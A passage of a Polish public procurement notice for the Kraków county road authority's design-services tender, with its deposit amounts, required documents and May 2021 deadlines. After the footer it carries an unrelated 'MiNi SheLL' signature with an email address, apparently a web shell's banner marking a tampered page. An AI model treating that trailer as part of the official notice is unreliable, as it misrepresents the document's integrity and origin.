skierowanych przez wykonawcę do realizacji zamówieniapublicznego, , wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nieczynności oraz informacją o podstawie do dysponowania tymi osobami – zał.nr 2 do SWZ. (W przypadku wykazania osób udostępnionych Wykonawcy przez inne podmioty należy dołączyć do w/w załącznika pisemne zobowiązanie tych podmiotów do udostępnienia tych osób)2) wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostaływykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadkuświadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumentypotwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; - załącznik nr 3 do SWZ. Wykonawca w wykazie wskaże usługi określone w warunku dot. posiadania wiedzy idoświadczenia (Rozdział II ust 6, pkt 2). W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi, wskazane w wykazie usług, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszym punkcie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty wg. załączonego wzoru. 2. Oświadczenie Wykonawcy w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO. 3. Kopia dowodu wpłaty lub poręczeń bądź gwarancji zabezpieczenia wadium. 4. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.5. oświadczenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu – zał. nr 2 do SWZ.a) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania,w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w ppkt 1,b) Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstawwykluczenia z udziału w postępowaniu: zamieszcza informacje o podwykonawcach w oświadczeniu, o którym mowa w ppkt 1.6. Wstępny harmonogram rzeczowo finansowy zawierający planowane terminy realizacji poszczególnych etapów opracowania dokumentacji projektowej oraz planowane terminy płatności wynagrodzenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Składając ofertę Wykonawca zobowiązany jest wnieść wadium przetargowe na czas równyokresowi związania ofertą w wysokości: Zadanie nr 1 – 1500,00 PLN; Zadanie nr 2 – 1500,00 PLN; Zadanie nr 3 - 300,00 PLN; Zadanie nr 4 - 900,00 PLN; Zadanie nr 5 - 700,00 PLN; Zadanie nr 6 - 800,00 PLN.2. Wadium może być wniesione w :- pieniądzu, - gwarancjach bankowych, -gwarancjach ubezpieczeniowych, - poręczeniach udzielanych przez podmioty, o których mowaw art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji RozwojuPrzedsiębiorczości (Dz.U. z 2019 r. poz. 310, 836 i 1572).3. Jeżeli wadium jest wnoszone wformie gwarancji lub poręczenia, wykonawca przekazuje zamawiającemu oryginał gwarancji lubporęczenia, w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznymubezpieczyciela. Dokument elektroniczny należy przesłać emailem przed upływem terminu składania ofert na adres zp@zdpk.krakow.pl, wiadomość należy zatytułować „WADIUM – nr postępowania: ZP-261-18-21 (Zadanie nr……)”. W treści tych dokumentów musi być zawarte zobowiązanie gwaranta lub poręczyciela do wypłaty sumy wadium na żądanie Zamawiającego wprzypadkach określonych w art. 98 ust. 6 Ustawy Prawo zamówień publicznych. 4. W przypadkuwnoszenia wadium w pieniądzu, powyższą kwotę należy wpłacić przelewem na konto ZarząduDróg Powiatu Krakowskiego,- GETIN NOBLE BANK S.A. O/ w Krakowie. Nr konta 38 1560 00132281 8759 8000 0010.5. Termin wniesienia wadium upływa wraz z terminem składania ofert. Wprzypadku wnoszenia wadium w pieniądzu Za prawidłowo wniesione uznaje się wadiumzaksięgowane na wskazanym koncie Zamawiającego przed upływem terminu składania ofert.6.Kopię dowodu wpłaty lub poręczeń bądź gwarancji zabezpieczenia wadium należy dołączyć dooferty. 7. Wykonawca, którego oferta nie będzie zabezpieczona prawidłowo wniesionym wadiumzostanie wykluczony.8. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie powyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy,którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem ust. 11 pkt 1.9.Zamawiający zwróci wadium wykonawcy, którego oferta została wybrana jako najkorzystniejszaniezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniuzabezpieczenia należytego wykonania umowy.10. Zamawiający zwróci niezwłocznie wadium nawniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.11.Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego wformie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4, występujeodpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli :1) wykonawca wodpowiedzi na wezwanie, o którym mowa w art.107 ust. 2 lub art. 128 ust. 1, z przyczynleżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowychśrodków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub ,oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub niewyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowałobrak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej; 2)Wykonawca, którego oferta została wybrana:a) odmówił podpisania umowy w sprawiezamówienia publicznego na warunkach określonych w ofercie,b) nie wniósł wymaganegozabezpieczenia należytego wykonania umowy (jeżeli jest wymagane),c) zawarcie umowy wsprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stroniewykonawcy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany umowy zgodne z art. 455 ustawy PZP. Przewidywanemożliwości zmiany umowy opisano w §11 Istotnych postanowień umownych (zał. nr 5 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com